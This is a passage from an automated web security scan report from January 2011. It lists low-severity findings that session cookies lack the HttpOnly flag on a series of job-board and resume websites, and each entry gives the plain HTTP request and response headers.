Confidence:   Firm
Host:   http://www.prcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.prcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:24:35 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=b4uv8543vsma7m3i4v2d0i48g1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:24:35 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:24:35 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:24:35 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:24:35 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:24:35 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:24:35 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:24:35 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:24:35 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 120302

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.115. http://www.preferredresumes.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.preferredresumes.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.preferredresumes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:29 GMT
Server: Apache/2.2.3 (Red Hat) DAV/2 PHP/5.1.6 mod_python/3.2.8 Python/2.4.3 mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 mod_perl/2.0.4 Perl/v5.8.8
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=tig2sucmmp7tj371vs9tftefe3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 83027

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">

<html>
<head>
   <title>Resume Writing Services, Professional Resume Writing, Cover Letter Writing
...[SNIP]...

10.116. http://www.procurementcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.procurementcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.procurementcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:22:39 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=mr66qa0ivqt5goom135g89nlu2; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:22:39 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:22:39 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:22:39 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:22:39 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:22:39 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:22:39 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:22:39 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:22:39 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 101019

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.117. http://www.productmanagercrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.productmanagercrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.productmanagercrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:48 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=l5s6qlvjn27hh7eesjabq2c214; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:48 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:48 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:48 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:48 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:48 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:48 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:48 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:48 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 106086

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.118. http://www.projectmanagementcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.projectmanagementcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.projectmanagementcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:43:19 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=k77p330j68s603hksj5he5k7t6; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:43:19 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:43:19 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:43:19 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:43:19 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:43:19 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:43:19 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:43:19 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:43:19 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 119200

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.119. http://www.publicinterestcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.publicinterestcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.publicinterestcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:34 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=d0md3kboqphlouu186urplhea4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:34 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:34 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 104328

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.120. http://www.publishingcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.publishingcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.publishingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:22 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=hjafrla8sm0vjpuuvbsqohvh76; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:22 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:22 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:22 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:22 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:22 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:22 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:22 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:22 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 114373

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.121. http://www.purchasingcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.purchasingcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.purchasingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:11 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=jp7jhr7hfsn4u1q0tf9pujn7l0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:11 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:11 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 105391

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.122. http://www.qaqccrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.qaqccrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.qaqccrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 22 Jan 2011 01:25:53 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=2cvnjstpd6ib3smaikg60ai1v0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Sat, 29-Jan-2011 01:25:53 GMT
Set-Cookie: useripcountry=277; expires=Sat, 29-Jan-2011 01:25:53 GMT
Set-Cookie: useripstate=3896; expires=Sat, 29-Jan-2011 01:25:53 GMT
Set-Cookie: useripcity=2655979; expires=Sat, 29-Jan-2011 01:25:53 GMT
Set-Cookie: usercountry=277; expires=Sat, 29-Jan-2011 01:25:53 GMT
Set-Cookie: userstate=3896; expires=Sat, 29-Jan-2011 01:25:53 GMT
Set-Cookie: usercity=2655979; expires=Sat, 29-Jan-2011 01:25:53 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Sat, 29-Jan-2011 01:25:53 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 120361

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.123. http://www.radiocrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.radiocrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.radiocrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:39:13 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=beoah5h5h42a821e8g7r1l0ko5; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:39:13 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:39:13 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:39:13 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:39:13 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:39:13 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:39:13 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:39:13 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:39:13 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 113112

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.124. http://www.realestateandlandcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.realestateandlandcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.realestateandlandcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:57 GMT
Server: Apache/2.2.3 (Red Hat)
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=om23b647f73v2jeihjo6qjanv4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:57 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:57 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:57 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:57 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:57 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:57 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:57 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:57 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 133093

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.125. http://www.recruitingcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.recruitingcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.recruitingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 22:29:23 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=rtub18ulrc3vam4sd88gmoelh0; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:29:24 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:29:24 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:29:24 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:29:24 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:29:24 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:29:24 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:29:24 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 22:29:24 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 105534

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.126. http://www.researchingcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.researchingcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.researchingcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:42 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=14bsqa9jfj35kburppunl56pe1; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:43 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:43 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:43 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:43 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:43 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:43 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:43 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:43 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 112960

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.127. http://www.resumeboomer.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.resumeboomer.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.resumeboomer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 19:41:25 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Set-Cookie: PHPSESSID=rflo577r2gvrm7p49d1ei6a8c1; path=/; domain=resumeboomer.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 18190


   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...

10.128. http://www.retailcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.retailcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.retailcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:38:47 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=0f8bbnd9tsuoh4h0j5d47on745; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:38:47 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:38:47 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 105722

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.129. http://www.sciencescrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.sciencescrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.sciencescrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:01 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Set-Cookie: PHPSESSID=16dk0s9ru5o61n37p22c60grs4; path=/
Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 23:42:01 GMT
Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 23:42:01 GMT
Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 23:42:01 GMT
Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 23:42:01 GMT
Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 23:42:01 GMT
Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 23:42:01 GMT
Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 23:42:01 GMT
Set-Cookie: regioninfo=2655979%7E32.7830556%7E-96.8066667; expires=Fri, 28-Jan-2011 23:42:01 GMT
Connection: close
Via: 1.1 AN-0016020122545304
Content-Length: 139820

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<script language="javascript">
var HTTP = '';
var LCWAWINDOWNAME = '';
var include_
...[SNIP]...

10.130. http://www.scientistcrossing.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.scientistcrossing.com
Path:   /

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.scientistcrossing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 21 Jan 2011 23:42:44 GMT
Server: Apache
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
